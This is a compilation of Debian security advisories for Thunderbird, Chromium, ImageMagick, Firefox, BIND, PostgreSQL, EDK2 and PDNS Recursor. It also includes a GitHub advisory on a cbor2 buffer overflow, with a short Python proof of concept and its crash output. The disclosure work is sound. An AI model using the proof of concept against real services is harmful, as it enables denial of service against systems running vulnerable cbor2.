Debian Linux Security Advisory 5630-1 - Multiple security issues were discovered in Thunderbird, which could result in denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5630-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
February 23, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : thunderbird  
CVE ID         : CVE-2024-1546 CVE-2024-1547 CVE-2024-1548 CVE-2024-1549   
                 CVE-2024-1550 CVE-2024-1551 CVE-2024-1552 CVE-2024-1553

Multiple security issues were discovered in Thunderbird, which could  
result in denial of service or the execution of arbitrary code.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 1:115.8.0-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:115.8.0-1~deb12u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmXY2ywACgkQEMKTtsN8  
TjaW9xAArkLgPB17t1jSCCm7U0jzbPKFTVdq0gHcPnwnTr2gtyoa7Ev5MpEa8ykm  
3x7xrmTtYHY2Pnz5kHYo/D0bBOfNE4bvOlYcPtzi9WG+N5BOJwsYdfA7IRY6kDtu  
HlNoywMpX43EoKYYSKxiwE37HyIjBlcvRh3bs9lr7nBvqyYKr2IHXbXgC89VxYm/  
ijszn2DH+kU0+P/0rKVO1GFyxJXHKTyP9Y2xsHHZURRiqKbGP+NWO+cuIqmqibq5  
HFkLAdlkOfog4QJW0OjMkKCHMtTF8lJYMOslfGYwBCGVRQPIWWALizvs8ORxpzub  
4B3wgNxsKcCHrfoyXW+AfvI4faFnZLKG0iqPu2YOaBIYQmHVNmEAzws96wBL2Jsc  
9qF6LLakZGDSXrx52J813Q2Sov420lhqoRG7Pe4j2aDUmxApYDAVbTqOcvQXpxer  
3CqugQc1uKtVqgF/oMLD1qi5C/fOtsTSdkmrLTPqn9KlI9i4u2Nu7Hg1+aCt4Q23  
eB7fF5ZuH554Fohvd1rCpjWBhe1mt6fOLtx+PYHirJLgkG4/M0yPg9yT74sCCvpP  
fmlTO14kBNU676S0pfproABZDY+iyfyCEEcZp0UBfcwrrsIqgXaUj9ghrvfY4Iff  
VVAhkPeDOrsSgDZob+3UO7qCP62vL0KmN8vPGU+g/e/8gr/48oA=  
=I9lx  
-----END PGP SIGNATURE-----

Debian Security Advisory 5630-1

Debian Linux Security Advisory 5629-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5629-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonFebruary 23, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-1669 CVE-2024-1670 CVE-2024-1671 CVE-2024-1672                  CVE-2024-1673 CVE-2024-1674 CVE-2024-1675 CVE-2024-1676Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 122.0.6261.57-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmXYNoEACgkQZF0CR8NudjcqXA//bWGEiwv3xiYCsDresz86tTt51gyCKz7ZKSKHC2t2McxigIZKroa+I0X2gCGVAMUXCUS8ws06l0MENOXAzSzs141geA+G+HZ0rLQsO0F8PyMNYYrLR+Dglc+j6+oOHhLyU9UmYi7M46NfzrmYde3D/EnNrKQr1LlYLSkjokeNnzkmS6WQekJUtnh+O7v0GQzgSNSxka5Pj/NwUbB0anRY3vYw4RGDuZS0RaWz6njbexBiYf+shHfm8c0ZppV788VJhhD1bI+G5jc6Y46Xc50J2CcU+EnaxfTcRQluGXMOgnpgUG74Vr6YfCp+5KYw6aOqCRLHVY5p+f4xiw20DpvzSRbFuDpy8o4pgd0lwwhfa7C/LmA9jnm6kzvMth/Ra0lLbSVax4COTxdqCxLMwgVVa/6IWXaW0Cp0SdouB5hstogayKuDizqwAd6+72ArNkAdUCxLNVlgUqjK2S2cVzfHPJQ0Mn3nAXV/9MZAqATYI1DY2ZdWYOsupAN2E/CST/uIOGBYStjERed3DinaC2EVA2QdZZPwQpOpZYuIiG9b4qQ7BXgEMjjZPvhUlmeTyYnNJp3+BfHEXgTCLrsCIitp57wD7BqIOyL2YY5wNE8VWk5Kk7ZCYbs3YV70RyHovB+BDAc/i5aYOrsGJ1mI5bLDMFZ0GT3gKin+BkzqfyC+7EU==b0l1-----END PGP SIGNATURE-----

Debian Security Advisory 5629-1

Debian Linux Security Advisory 5628-1 - handling problems and cases of missing or incomplete input sanitising may result in denial of service, memory disclosure or potentially the execution of arbitrary code if malformed image files are processed.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5628-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
February 22, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : imagemagick  
CVE ID         : CVE-2021-3610 CVE-2022-1115 CVE-2023-1289 CVE-2023-1906   
                 CVE-2023-3428 CVE-2023-5341 CVE-2023-34151  
Debian Bug     : 1013282 1036999

This update fixes multiple vulnerabilities in Imagemagick: Various memory  
handling problems and cases of missing or incomplete input sanitising  
may result in denial of service, memory disclosure or potentially the  
execution of arbitrary code if malformed image files are processed.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 8:6.9.11.60+dfsg-1.3+deb11u3.

For the stable distribution (bookworm), these problems have been fixed in  
version 8:6.9.11.60+dfsg-1.6+deb12u1.

We recommend that you upgrade your imagemagick packages.

For the detailed security status of imagemagick please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/imagemagick

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmXXmJoACgkQEMKTtsN8  
TjZ4oA//dcUTeog3Pl7y1vg7o0IRWkWMbHtamfOavzrUPt+r9LFc1B0HAxUhrtet  
r7svk5r2WlQjMjcANg19F1hVqGAx+WVKFz15ydmzugU7TWoudZdSyE0gcAQfW4mg  
UeiU+MnhcOyIfJJuV+EQD3JvsfLmRzMGG5WzDTkTbe+y78paXrskMY/y5vhSPlnR  
+3wyqdZ0R1urzoVpShj1fullrmTTUnTr3/kxTXm5S1LBjcMwpdMoRTFJBuOXlPSa  
jA+dDkpeer/UiBIH0piaUmxByG2BtzDGjvvi6BlohqvpERFrqfsb59+Scimi3arr  
vYHELehJTqM+jUvg3VehSGTFId6qsGVsM0eKUFtFMdlL016U34LICfP+FDlP1DJ0  
VKyab9UDyU6Zf7aWiVnJt6GQdicIQ64hsvVBuj3u90WcI63qR6RybuxmGhBfIJs+  
VkG23qv8DjrvRpFesUaTvbOfMOJ3q0OvXIF9TMx5CNimPuEc8esg2Ktzdoaiy7Vj  
gmNewYaGRqrLDLsK48pJx4qLz4WfvRLVZPWnKuyUaQaRsybsSdFx+r8id/utJ6sW  
6I8H9KouHflKPZhzccnMGHZJFD1H/DzQHAbCvUz8yKaA+OMU5RgcsGWawmRhavDW  
fXzfUyMSJYV57voszyQmrBMOSzQHi/f0SIBqFtK928ATLXHY/bs=  
=KFsb  
-----END PGP SIGNATURE-----

Debian Security Advisory 5628-1

Debian Linux Security Advisory 5627-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, information disclosure or spoofing.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5627-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 21, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2024-1546 CVE-2024-1547 CVE-2024-1548 CVE-2024-1549                  CVE-2024-1550 CVE-2024-1551 CVE-2024-1552 CVE-2024-1553Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode, information disclosure or spoofing.For the oldstable distribution (bullseye), these problems have been fixedin version 115.8.0esr-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 115.8.0esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmXWMR4ACgkQEMKTtsN8TjaDlA//fDAeX2ygNbo0sLoW1clJPeTW3g+xEc/azTf/0Cpgcr6epyy1GUKlTwMCTFpYhSga9kHs8OyFyaDhePcqisszk37WL6SVG0dgGb4NoRk+D8VHVu5y017jUIL3FEsHfeWqgD8/+G1LFJ2ulDjQDiLf3ADq+8T63gMkDlS4ox1mmJHlPQ9JIpBx0wE6hVLJiXxe2a8yNkst3CWET8P9SzJCSHDSrY1zuQrf2OtrFxQwYy0R5B/TOmuHHPvi911pM4T9awdnDFYKWaVR0w1KOnoEtmeFgcmxwe3rcv/smCcmU8UN7AqmGFGPeYvbj+qLXXZQji/4btm4e8YDHVWwuKxuvJP0BcEqkJ/nsxzYre2k5xfBZ+BJvucM7oKuuImvP/t4mEP5twLmqN46ACr8FoJsG+pMJsTmWERtI3qCgBDkNQejaYJhwb25/N3GpO9RVsAd/szaVkd/tvqUBlva/oISs/4N7n6GgPw/AuAMDKmXcsB6ZFrxNWGWsMdTaeTvcl+Cvh1Ads9ZC/LI9K89L2fhx36EyNnPFnrrEa8D3ykscP0PbPaILdIG/mqqDD+oB1CQK0qI7YWrg2KfRlfPDEuew1oBhdwcWIIHm6bBUaL26tihOHfTTx4d2A3THOaoLcih3/np2rGQfR4BLVWyaky0l4rfm/9GyLN/hZmKXqsX7WU==PblS-----END PGP SIGNATURE-----

Debian Security Advisory 5627-1

### Summary
Ever since https://github.com/agronholm/cbor2/pull/204 (or specifically https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542) was merged, I can create a reproducible crash when running the snippet under PoC on a current Debian bullseye aarm64 on a Raspberry Pi 3 (I was **not** able to reproduce this on my x86_64 Laptop with Python 3.11; I suspect because there is enough memory to allocate still)

## Details


### PoC
```py
import json
import concurrent.futures
import cbor2

def test():
    obj = "x" * 131128
    cbor_enc = cbor2.dumps(obj)
    return cbor2.loads(cbor_enc)

with concurrent.futures.ProcessPoolExecutor() as executor:
    future = executor.submit(test)
    print(future.result())
```

```
malloc(): unsorted double linked list corrupted
Traceback (most recent call last):
  File "test.py", line 14, in <module>
    print(future.result())
  File "/usr/lib/python3.9/concurrent/futures/_base.py", line 440, in result
    return self.__get_result()
  File "/usr/lib/python3.9/concurrent/futures/_base.py", line 389, in __get_result
    raise self._exception
concurrent.futures.process.BrokenProcessPool: A process in the process pool was terminated abruptly while the future was running or pending.
```

If one calls it without the indirection via the pool executor, a SystemError is shown that hides the buffer overflow.

```py
import json
import cbor2

def test():
    obj = "x" * 131128
    cbor_enc = cbor2.dumps(obj)
    return cbor2.loads(cbor_enc)

print(test())
```

```
Traceback (most recent call last):
  File "test.py", line 12, in <module>
    print(test())
  File "test.py", line 9, in test
    return cbor2.loads(cbor_enc)
SystemError: <built-in function loads> returned NULL without setting an error
```

### Impact
An attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object.

**Summary**

Ever since agronholm/cbor2#204 (or specifically agronholm/cbor2@387755e) was merged, I can create a reproducible crash when running the snippet under PoC on a current Debian bullseye aarm64 on a Raspberry Pi 3 (I was **not** able to reproduce this on my x86\_64 Laptop with Python 3.11; I suspect because there is enough memory to allocate still)

**Details****PoC**

import json
import concurrent.futures
import cbor2

def test():
    obj \= "x" \* 131128
    cbor\_enc \= cbor2.dumps(obj)
    return cbor2.loads(cbor\_enc)

with concurrent.futures.ProcessPoolExecutor() as executor:
    future \= executor.submit(test)
    print(future.result())

    malloc(): unsorted double linked list corrupted
    Traceback (most recent call last):
      File "test.py", line 14, in <module>
        print(future.result())
      File "/usr/lib/python3.9/concurrent/futures/_base.py", line 440, in result
        return self.__get_result()
      File "/usr/lib/python3.9/concurrent/futures/_base.py", line 389, in __get_result
        raise self._exception
    concurrent.futures.process.BrokenProcessPool: A process in the process pool was terminated abruptly while the future was running or pending.
    

If one calls it without the indirection via the pool executor, a SystemError is shown that hides the buffer overflow.

import json
import cbor2

def test():
    obj \= "x" \* 131128
    cbor\_enc \= cbor2.dumps(obj)
    return cbor2.loads(cbor\_enc)

print(test())

    Traceback (most recent call last):
      File "test.py", line 12, in <module>
        print(test())
      File "test.py", line 9, in test
        return cbor2.loads(cbor_enc)
    SystemError: <built-in function loads> returned NULL without setting an error
    

**Impact**

An attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object.

**References**

*   GHSA-375g-39jq-vq7m
*   https://nvd.nist.gov/vuln/detail/CVE-2024-26134
*   agronholm/cbor2#204
*   agronholm/cbor2@387755e
*   agronholm/cbor2@4de6991
*   https://github.com/agronholm/cbor2/releases/tag/5.6.2

GHSA-375g-39jq-vq7m: Potential buffer overflow in CBOR2 decoder

Debian Linux Security Advisory 5626-1 - It was discovered that malformed DNSSEC records within a DNS zone could result in denial of service against PDNS Recursor, a resolving name server.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5626-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 18, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : pdns-recursorCVE ID         : CVE-2023-50387 CVE-2023-50868It was discovered that malformed DNSSEC records within a DNS zone couldresult in denial of service against PDNS Recursor, a resolvingname server.For the stable distribution (bookworm), these problems have been fixed inversion 4.8.6-1.We recommend that you upgrade your pdns-recursor packages.For the detailed security status of pdns-recursor please refer toits security tracker page at:https://security-tracker.debian.org/tracker/pdns-recursorFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmXSMZcACgkQEMKTtsN8TjaCXA//RzokD4ns3XxUhHK3Q3i2KDp1Y1c2sbZzSRXw0Lw7K8xrCqZDksURciCkThiKqF+F3sKHaRt2Agj99DwWJ7fC+BuHJ0s73yRsrKX7HL6At/z1XE+Cw4UU775c3pydDoS+hTfLGbSLgnpdKg7do/u9uZ29tMpTWv6QpNl5mF0irsKnbYdz9XEe9SaJnlj5tpBYhptZP4AlmDXbWr4tIjx01X3JWOqKbsT8/08JYqd0AcKlihsqs4Wv1ggBmRBo4/1YjPD3ONgqrswikehbd9dMtzyFIJy6Yjo/HxVe1RnQH39rx4PzdkezP9MX4Ug6a2vzcqy3E3kGBgetQ6e7FETnV+94XFN2UfUtmBWjiTmU84k3+isgb8Xe+liFFVx86OZbUlkQ+tRgsNHw3uSsJf+5J3kr9Bacs4xdvZXxMSz5JrG484/YUd1wHVb3S/bv0vC7/BLhletXBhoz3MBa0m7qntNFexJyYoe2AYD1WLTfl10IuiZwpO6lnolj2XIIulORIhi72TdC4L7ZE6/fZr3XilMA4Y06ODlAQw3hpwf66YcOjuTC2lgrqoX09zyGrO3j729rW/O5JASnSR5jFv6eXV9a+YEqN7f6vgTjiE0GABpAdQ8CSp95WVLis51UtQ37FZdPp27/2lCFAd4UMnrJmDnVpsPTVFyNjQoBuKYdf8Y==rNYz-----END PGP SIGNATURE-----

Debian Security Advisory 5626-1

Debian Linux Security Advisory 5624-1 - Mate Kukri discovered the Debian build of EDK2, a UEFI firmware implementation, used an insecure default configuration which could result in Secure Boot bypass via the UEFI shell.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5624-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 14, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : edk2CVE ID         : CVE-2023-48733Mate Kukri discovered the Debian build of EDK2, a UEFI firmwareimplementation, used an insecure default configuration which could resultin Secure Boot bypass via the UEFI shell.This updates disables the UEFI shell if Secure Boot is used.For the oldstable distribution (bullseye), this problem has been fixedin version 2020.11-2+deb11u2.For the stable distribution (bookworm), this problem has been fixed inversion 2022.11-6+deb12u1. This update also addresses several securityissues in the ipv6 network stack (CVE-2022-36763, CVE-2022-36764,CVE-2022-36765, CVE-2023-45230, CVE-2023-45229, CVE-2023-45231,CVE-2023-45232, CVE-2023-45233, CVE-2023-45234, CVE-2023-45235)We recommend that you upgrade your edk2 packages.For the detailed security status of edk2 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/edk2Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmXNGWIACgkQEMKTtsN8TjaBVg/8D3psWKk7kf9Ht+2Bbfsp5cN63qKRPAXTDjGELCp+98Dd7CUaZnCCxA4wW0xAqWdHWkx+PbgyLJ3aPzttL//yk3ZIBEXl6pw/o2jicFlf7ds1zlJFZJbfl63hVb9cJCjrgnPgH6SLfQeHckad5876LE78xl5mukRyL3ZWeSHOBRavFvct14H2qDAMquXtQKHtw6NOVc3ZciSHbBhjNG+hhPJL0eZ6HSDf2MI5ulYjMcNwgVm7jEwOGq4lVUowCNbJ71PzI5T26H2HqDkQTCFEEZJzjt3PDStVT7hnhVpbUqtvJxjHYruuWzPIFwpjIyA9LkQqP4CRVgK/6+FeuE/F28iUkrStXzPYAXPUzJ7GWSFfz16ViyuUJf6spWpMhcruIwBnH1iLQt68hFodiCcJeQaim3u3cQfFsE4YvlTPzj9NddoBzXsCdG81EfeFH9/J1iEkKxQ76Ocw8TiLhVe2C09MVqIKCB9YDf1ESR6TaBV7Hdx0Dh7XOVc9+symHPmLP/0Bt7rIQXCi/aYz96qtl5/wHSWiEWRCogSUOJ05OEF+/QJqWWIrim4Z9RMW9BZCGJBaUi83Ye+HUdxjnZkpT5kMiEH2y7CY85R5fuBMn4GC8gf66hcxT4milzLMpt/jtdH3h0J9MKFq85TlPf9pxGAF/o3Neg5KtSmYVKqbkIs=yQYY-----END PGP SIGNATURE-----

Debian Security Advisory 5624-1

Debian Linux Security Advisory 5623-1 - It was discovered that a late privilege drop in the "REFRESH MATERIALIZED VIEW CONCURRENTLY" command could allow an attacker to trick a user with higher privileges to run SQL commands with these permissions.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5623-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
February 14, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : postgresql-15  
CVE ID         : CVE-2024-0985

It was discovered that a late privilege drop in the "REFRESH MATERIALIZED  
VIEW CONCURRENTLY" command could allow an attacker to trick a user with  
higher privileges to run SQL commands with these permissions.

For the stable distribution (bookworm), this problem has been fixed in  
version 15.6-0+deb12u1.

We recommend that you upgrade your postgresql-15 packages.

For the detailed security status of postgresql-15 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/postgresql-15

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmXNGWEACgkQEMKTtsN8  
TjaTTA/9HOtLP5LdqTGsquzchn+w+V3WH/WqapW1lw0FZ6UbihaV5E+v1ssef7ty  
Fyr+LsvD7g2gjE6YE+ABGxrYy67rnZWh79TWSK77ReXwzT8Ccz87itxrvUgkVelo  
d0fRlQKWPAtlYOgKAEUcflHzATrf9XJmcr8TdCtISVHAn7kWpdv+kwWUrvp7ZAVm  
Q1rBvTMZKPkP6GRvrSii51FlKaPa8JFmdu9LIPy1WR/ynipxdx3wn/R+hmZ2SHFN  
18KmBd5vAmG8WyvYWGrWx2IntguW0oqC6Lo9pdqgsbC3Uve8RnGfnqP+tLwsB44Q  
82C7uOX3EGDJEAonMXSrgu3jO1v9rjfHF0Gh2Ji6TNmqXwx4bxsMWC6qgqKap4mS  
Y0htECp9juezF9/aaT5zKMynXOpF7U0YmWU5uNW83PZNHJvULYof3SjHvqfnAL6Z  
ZxA5TYcAvm2xD/FFsjzJiLC+hDTCD/nm1R6W/em0qWL7EKhifJFUGjSo5GT8jtc/  
d3dLHPEXAk/SLeXtnSvLmsHIM3T+hl7cmWl37D4tg3XvyztgGC1Blbama81bTAEO  
uj0/ZE+UiMJC2ORywlJljlTlgbaHljBwc3S+H6vaPIDOstDtZLZf46o/x/A2fC97  
Pe59M7w8Salwdp7HZTOIkhFz4cdyMKMb/yd/3jZN9M2jdj6KVao=suSm  
-----END PGP SIGNATURE-----

Debian Security Advisory 5623-1

Debian Linux Security Advisory 5622-1 - It was discovered that a late privilege drop in the "REFRESH MATERIALIZED VIEW CONCURRENTLY" command could allow an attacker to trick a user with higher privileges to run SQL commands with these permissions.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5622-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
February 14, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : postgresql-13  
CVE ID         : CVE-2024-0985

It was discovered that a late privilege drop in the "REFRESH MATERIALIZED  
VIEW CONCURRENTLY" command could allow an attacker to trick a user with  
higher privileges to run SQL commands with these permissions.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 13.14-0+deb11u1.

We recommend that you upgrade your postgresql-13 packages.

For the detailed security status of postgresql-13 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/postgresql-13

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmXNGV8ACgkQEMKTtsN8  
TjYPYBAAlJuqv8akj+o9j/7gYbpr2LNymLYvhDuHDtHjMMSoT5zBYxCMtKtgc84v  
aEFLrm+1CAejvV+8kOTN8cbFF2CSacfFKDV2/9JJY/dxKZ50QL92QNPnZ6aq7KeM  
/iX8Sqp58dey+/VyNy9S8Mv2fVRN8g7UprR+hBKNyqtMAW7np+C5LUgOLYJc4Iqc  
DPHTTAcMKSYn5vCCQrF7QbCKEzT9KDena7xax6HPR+8F5EI0TIBXL97naslyoLKK  
oHrZPDl7hDUxw+IBYfpcMHZWQCSpCP50OUDnZBcPVRCatbki6pDdM6lymXhDWxbh  
uRlBAUmuPRozP8qrfh+m2EBb2aRDz2QJlmehrY8J+j0tM0dJi1dX34SSqLd3nFyZ  
/24KZoNwkAXbb+OBZD1jsu1IMxWvZm3QhlGRUXnXF7AyJiKQDaOz2b1W9B19Fmm3  
z6bQaEbgGf0MTtT/IpEwDMqGrnkl210KA/qVl1gFSbLETGjPh0rLY8ANuKNLGuDs  
1yPEULUBm0G7ZO7JgjlfMvZLlbNotz0Jl5jKr0uGdT+q8H8NxDUT7UJlDiUNDXm0  
D0LK1vzhr86fGRW9lG8a+OntOpnHPrWbFi5mVTIcuPmd6ekIvOCTeAg6dLliuLcf  
fFlWOUD20Xxsz8M0Xkd4NEAod67bk4NWzbHA0XSVa6M0z2u1lok=Kp2y  
-----END PGP SIGNATURE-----

Debian Security Advisory 5622-1

Debian Linux Security Advisory 5621-1 - Several vulnerabilities were discovered in BIND, a DNS server implementation, which may result in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5621-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 14, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : bind9CVE ID         : CVE-2023-4408 CVE-2023-5517 CVE-2023-5679 CVE-2023-6516                  CVE-2023-50387 CVE-2023-50868Several vulnerabilities were discovered in BIND, a DNS serverimplementation, which may result in denial of service.For the oldstable distribution (bullseye), these problems have been fixedin version 1:9.16.48-1.For the stable distribution (bookworm), these problems have been fixed inversion 1:9.18.24-1.We recommend that you upgrade your bind9 packages.For the detailed security status of bind9 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/bind9Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmXMcl8ACgkQEMKTtsN8TjZIvg//cFDic8ui1mjgizp0lnhPN3ckeYRMWPVXCdq6MZR8JOOB5q2EGd+dBhDmTOI2ZCPXzjmFRywwkAVowf5iGVT9cczSXyUUr773w4B9MdYAvVc/RZOZVQtz/45w/qnj+sx7drh71ffkQmGf6xJz1hj6NwBK6faprNmyA81gTVvoE2aDBfY5d2gRa0m/xKSVbO+DN2Tmh9wAMqXyf+pSQjUNopllUaEo1otLP1TRA/5LnL2UrLiCt0B7Jn9q3QdrYDS9hke9+p9uuoWEIpS/oiNlxnL2bxE4CdAWy93J6qllSUfJo4RQbIcgySCrdESH7fvCk3walvIkq6mQldB6M5JDUYrY/j0IkA/HptIx3R3+CbBJYu/5ark7/XHVKaTzw5aoerv8JK8NljRlXuG86r/lTjRmObr7WiHBssxgsenfrGcAyXQoKusRwZASgbzh6CiZmg9Ihaqf1DixQ5R/9G/qlyQWDIfXVpevmyBmYPHKymIK2fMHjXTqF/6xBzwzmuKQJGm4Gf4X9gYmvMNx9gh6dqK+hJf6/3ifzuZ4Wx5XMp2ZnlRBENvVfzF/Kk07ej+1UE8QcYAdNSynXQqFmo5+kfGHemtZRmKzqECPJoVYFSWJ09FTXsXo/8je0wDkgZfhuaQ7lhfiXEztFz2dmzOrlc18NUSXyaWhzQFHqP53fQc==mhef-----END PGP SIGNATURE-----

Tag

#debian